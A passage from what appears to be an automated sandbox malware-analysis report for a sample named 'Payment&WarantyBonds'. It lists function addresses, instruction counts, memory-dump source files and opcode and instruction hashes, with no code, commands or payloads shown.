                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6fe9cb915c7f8ee7770962ef2d691cd4f162b0d427146b4fc07ab423a0504f08
                                                                                                                                                                                • Instruction ID: 74dda1e0507eeebbc97949257edf7e2f19229ceae7fbbb352382ec113011ebea
                                                                                                                                                                                • Opcode Fuzzy Hash: 6fe9cb915c7f8ee7770962ef2d691cd4f162b0d427146b4fc07ab423a0504f08
                                                                                                                                                                                • Instruction Fuzzy Hash: D03129B25002018BDB71AF5CCC40BA977B4EF50314F5482A9DD45DB386EA349B82CBA1
                                                                                                                                                                                Function 018BC3CD Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                                • Instruction ID: f880e310b61daa20beccb98b555599819289a62644f7c51e01f560236c3d768e
                                                                                                                                                                                • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                                                                                                • Instruction Fuzzy Hash: E6212D3A600A5677CB15AB9988C0AFBBFB4EF40710F40841AFA55C7751E739DB40C3A1
                                                                                                                                                                                Function 017FE420 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: be4c330c339d2bb6d6f5bc98e51e22fbc68af573c6c8788cd3357c179dc3413e
                                                                                                                                                                                • Instruction ID: 2cea2628532c7f97caf0196ab72f5b903d5d698aa595f7c4395edc20b281806a
                                                                                                                                                                                • Opcode Fuzzy Hash: be4c330c339d2bb6d6f5bc98e51e22fbc68af573c6c8788cd3357c179dc3413e
                                                                                                                                                                                • Instruction Fuzzy Hash: CC31C432A0051C9BDB319F18CC41FEEB7B9AB15750F0200A9F745E72A0DA749E808F91
                                                                                                                                                                                Function 01834588 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                                                • Instruction ID: 12dfdd773e712d4748a653fe83285e7216587e34567150b8597a3f21930956f6
                                                                                                                                                                                • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                                                                                                • Instruction Fuzzy Hash: 48217136A00609EBDB15CF58C980A8EBBB5FF88714F1480A9EE15DB241E671EF059B90
                                                                                                                                                                                Function 018344B0 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8912e681535670918d765cb1bc9f11f43970801575ce2c36d467b4bb16a15cf3
                                                                                                                                                                                • Instruction ID: 592dc512907959410f4b8569cab29623277be77f72eb09a77e1739844986caa3
                                                                                                                                                                                • Opcode Fuzzy Hash: 8912e681535670918d765cb1bc9f11f43970801575ce2c36d467b4bb16a15cf3
                                                                                                                                                                                • Instruction Fuzzy Hash: 09218172A047559BC722DF18C840B6B7BE4FF88760F054519FD55DB681D730EA018BE2
                                                                                                                                                                                Function 017FE388 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                                                • Instruction ID: 7ee46cdaace5dee588fd72bc49c4e8d3c17030efebfbc295ca88e2bc15fda99c
                                                                                                                                                                                • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                                                                                                • Instruction Fuzzy Hash: DA316931600605EFE721CB68C884F6AB7F9EF45354F1145A9EA52CB3A0EB34EE02CB51
                                                                                                                                                                                Function 0187E609 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2775fc582c8f0532bf8aa18e3d731398a9de9ff5aea6d320b5f4b4d4da186dab
                                                                                                                                                                                • Instruction ID: c9ccd530f5eaf27e0ca137e8626ad4379d0e720581b34522e9f260d4227bf6d0
                                                                                                                                                                                • Opcode Fuzzy Hash: 2775fc582c8f0532bf8aa18e3d731398a9de9ff5aea6d320b5f4b4d4da186dab
                                                                                                                                                                                • Instruction Fuzzy Hash: 6C317C75A00209DFCB14DF1CC8849AEB7B6FF88314B254599E809DB3A1EB71EB50CB91
                                                                                                                                                                                Function 018806F1 Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3c62c0accdff844aa0c19e17b32282d11ad4999d034a3acb1e707a25d7282464
                                                                                                                                                                                • Instruction ID: f892839d9e1887339d833b9f6bb8f388573df645a61449fbdbbab1d17454aabb
                                                                                                                                                                                • Opcode Fuzzy Hash: 3c62c0accdff844aa0c19e17b32282d11ad4999d034a3acb1e707a25d7282464
                                                                                                                                                                                • Instruction Fuzzy Hash: 2A2191769006299BCF10EF59C881ABEB7F8FF48740B554069F941E7244D739AE41CFA1
                                                                                                                                                                                Function 0188019F Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c928d7f3be6f00ad8413db6ed718b9ff55858aafe2784c52a257f2a6fb1dd551
                                                                                                                                                                                • Instruction ID: 00b000c129b93793f8fedbe4ea1514ac9d3c7d1c2d2beb5fb53e16885d7135e8
                                                                                                                                                                                • Opcode Fuzzy Hash: c928d7f3be6f00ad8413db6ed718b9ff55858aafe2784c52a257f2a6fb1dd551
                                                                                                                                                                                • Instruction Fuzzy Hash: BF21AE72600645AFD715EBACD840F6ABBB8FF58750F140069F904D7691D738EE40CBA9
                                                                                                                                                                                Function 01880283 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: aef5c2abe0162159e3d11a3ae5a1a428a536da7dd5d88cd25cecd9973c72125f
                                                                                                                                                                                • Instruction ID: ca8af9a1a7ba90994eab9b41c11b8b898b0df4d0284b428cd225c2715e93e424
                                                                                                                                                                                • Opcode Fuzzy Hash: aef5c2abe0162159e3d11a3ae5a1a428a536da7dd5d88cd25cecd9973c72125f
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A21D0729043469BD712EF5DC844B5BBBECAFA0350F080466BD80D7251D734CB08C7A2
                                                                                                                                                                                Function 01822835 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d55cb0d49199aac7f1f556c0b2272f8069bbedb95205ba23bfd5bba648d80eae
                                                                                                                                                                                • Instruction ID: 47956b8ee7d01c42d8d255d1707f62a6c8d3ab45129c9cc992894101dcc88c80
                                                                                                                                                                                • Opcode Fuzzy Hash: d55cb0d49199aac7f1f556c0b2272f8069bbedb95205ba23bfd5bba648d80eae
                                                                                                                                                                                • Instruction Fuzzy Hash: 03213B32704695ABE327572C8C04B247B9AAF41B74F190364FA20FF6D2DBACCA41C211
                                                                                                                                                                                Function 0183A30B Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5b50c9f0bc15d7456cf70dd92db0a313700b8863a70455d9e3628142415e7069
                                                                                                                                                                                • Instruction ID: 4e76ef872c3bb4216bbad6edd17bae5cc80485adb41360af05462d80f0a11b7c
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b50c9f0bc15d7456cf70dd92db0a313700b8863a70455d9e3628142415e7069
                                                                                                                                                                                • Instruction Fuzzy Hash: CC217979211A019FC729DF29C901B56B7F5BF48B08F28846CA549CBB61E371EA42CF94
                                                                                                                                                                                Function 018BA49A Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e1e787e58eb1810d064d52c8b81f6eb4f1186c385f4148b6b5b433a58a4baa67
                                                                                                                                                                                • Instruction ID: e5e34cd2da227efbb677b064ebd91da170e620a5521bd90f75906aae52e17b1e
                                                                                                                                                                                • Opcode Fuzzy Hash: e1e787e58eb1810d064d52c8b81f6eb4f1186c385f4148b6b5b433a58a4baa67
                                                                                                                                                                                • Instruction Fuzzy Hash: AD113A36380A157FE32656989C80FAB76D9DBD4B60F500028BB09CB380EB74EF008796
                                                                                                                                                                                Function 01880946 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 80534e2de0485d6e71392d6d7a5ebba9d252750c9f886faf7d8d24f2e77c24d0
                                                                                                                                                                                • Instruction ID: bf877fe93b8cfbca07af661cdd2c0f1070150e202c6414d46620ff51e0306ae7
                                                                                                                                                                                • Opcode Fuzzy Hash: 80534e2de0485d6e71392d6d7a5ebba9d252750c9f886faf7d8d24f2e77c24d0
                                                                                                                                                                                • Instruction Fuzzy Hash: 8121D6B1E00209ABCB20DFAAD8859AEFBF8FF98710F10012EE505E7340D6749A45CB55
                                                                                                                                                                                Function 018980A8 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                                                • Instruction ID: 12198b6a663409d04758c44bda10e30f7559b4bf58ed8b8910b99ab9d098a01e
                                                                                                                                                                                • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                                                                                                • Instruction Fuzzy Hash: 6D218EB2A0020AEFDF129F98CC40BAEBBB9EF8A350F244419F900E7251D734DA509B50
                                                                                                                                                                                Function 01830124 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                                                • Instruction ID: d1841d0a04a5d4636b44d02a4450944dbdb7b0356dbbfc88458e882caf833e5a
                                                                                                                                                                                • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                                                                                                • Instruction Fuzzy Hash: D211D073600A05AFD722DA48C840F9EBBB8EB80754F140029F601CF190D671EE44DB95
                                                                                                                                                                                Function 01808770 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6d04685b9f54b5518342c8d7b18b795dc7a9eacc273ea998b8fae1a048563968
                                                                                                                                                                                • Instruction ID: ee95d43864a04ae2fca9a334293d137e8179335f759d029179137124161296b8
                                                                                                                                                                                • Opcode Fuzzy Hash: 6d04685b9f54b5518342c8d7b18b795dc7a9eacc273ea998b8fae1a048563968
                                                                                                                                                                                • Instruction Fuzzy Hash: E211E631B006199BDB92CF4DC8C0916BBE5EF4B710B18407DEE08CF249D6B1DB418B90
                                                                                                                                                                                Function 0183AAEE Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                                                                                • Instruction ID: ba1386106d5226e91436d413469cd559257553ced71626bb1545b2352f50329f
                                                                                                                                                                                • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                                                                                                • Instruction Fuzzy Hash: FC217972600A45DFD7299F49C540A66BBE6FBD4B10F18887DE98AC7610C731EE01CB80
                                                                                                                                                                                Function 018080E9 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5247889877131029e46d26b94a0c15c61f2e21509cfbf6ee7e88561387fdb6e2
                                                                                                                                                                                • Instruction ID: 0a37727c089e662662cf1c83d9465aa2251ea21ba042bbcf6cd0e3381f73d338
                                                                                                                                                                                • Opcode Fuzzy Hash: 5247889877131029e46d26b94a0c15c61f2e21509cfbf6ee7e88561387fdb6e2
                                                                                                                                                                                • Instruction Fuzzy Hash: 62218E35A0060ADFCB15CF58C981A6EBBB5FF89318F20416DD105A7350C771AE46CBD0
                                                                                                                                                                                Function 0183674D Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3c0f48988cc93bc160ca25e73491cd148b070a5d67160635e1a3e5d72dec486d
                                                                                                                                                                                • Instruction ID: bd64b72069c152c1315d42f0678c78dc0af56d4844e2d08d9582652c72bd22fa
                                                                                                                                                                                • Opcode Fuzzy Hash: 3c0f48988cc93bc160ca25e73491cd148b070a5d67160635e1a3e5d72dec486d
                                                                                                                                                                                • Instruction Fuzzy Hash: 7B218E75510A00EFD7218F6CC841F66B7F8FF84354F54892DE59AC7250EA30AA50CBA0
                                                                                                                                                                                Function 0182E8C0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7d05a13c71b83591407e34528f7456e2df7bc59efb349217a9184be9503e267e
                                                                                                                                                                                • Instruction ID: 93c3f2b1ab15aab6d8fd6056b5da7bbf8d22d67f0badab50c751b192e6e7844b
                                                                                                                                                                                • Opcode Fuzzy Hash: 7d05a13c71b83591407e34528f7456e2df7bc59efb349217a9184be9503e267e
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F112F333001245FCB1ADB29DC91A6B729BEFD5374B35462DDA22CB254ED30DA41C795
                                                                                                                                                                                Function 01896870 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d8646cc9320b715e9b63ec734a312410d52d6664845f543d87f3e8373c3c9f80
                                                                                                                                                                                • Instruction ID: 53d8791f8447c59ce682004efe16f9758655f0b87e3037423cfac50282842dba
                                                                                                                                                                                • Opcode Fuzzy Hash: d8646cc9320b715e9b63ec734a312410d52d6664845f543d87f3e8373c3c9f80
                                                                                                                                                                                • Instruction Fuzzy Hash: 6411C672240518EFCB22DB5DCD40F9ABBA8EF95B64F254025F606DF251EA70EA01CBD0
                                                                                                                                                                                Function 018366B0 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1d755f2a1a2d97ce0f30f2aa320a846e0bfabb24605527ba7e276b2c67dfb7ee
                                                                                                                                                                                • Instruction ID: c9a4b3a78bfffcc01a6ff328c62851a313c6d19564e507d5d057a92e2e91d368
                                                                                                                                                                                • Opcode Fuzzy Hash: 1d755f2a1a2d97ce0f30f2aa320a846e0bfabb24605527ba7e276b2c67dfb7ee
                                                                                                                                                                                • Instruction Fuzzy Hash: D211BF76A01206ABCB26CF5DC580E5ABBE9ABC4750B698279D905DB315F630DF00CBE0
                                                                                                                                                                                Function 018CA8E4 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                                                                • Instruction ID: cf66756848549f90df2ab55d6b380fdcf1f7714c7cd31304be40ee36283c8167
                                                                                                                                                                                • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                                                                • Instruction Fuzzy Hash: 78110436A00909AFDB19CB58C841B9DBBB5EF84710F058269EC55E7340E631FE01CB80
                                                                                                                                                                                Function 01800AD0 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                                                                • Instruction ID: c6578a06a1996affb0e314402bc1e348788c749d0ef088cf1828ba39dbc975eb
                                                                                                                                                                                • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                                                                                                                                • Instruction Fuzzy Hash: 192106B5A00B099FD3A0CF29D440B52BBF4FB48B10F10492EE98AC7B50E771E914CB90
                                                                                                                                                                                Function 0188E7E1 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                                                                • Instruction ID: b06401ec885b4729b7a65da48490105e70006192a9b36201f27a9e21187ed276
                                                                                                                                                                                • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                                                                • Instruction Fuzzy Hash: 0311C232A20609EFE721AF4DCC44B5EBBE5EF45754F058428EA19DB160DB71EE40DB90
                                                                                                                                                                                Function 018227ED Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_17d0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
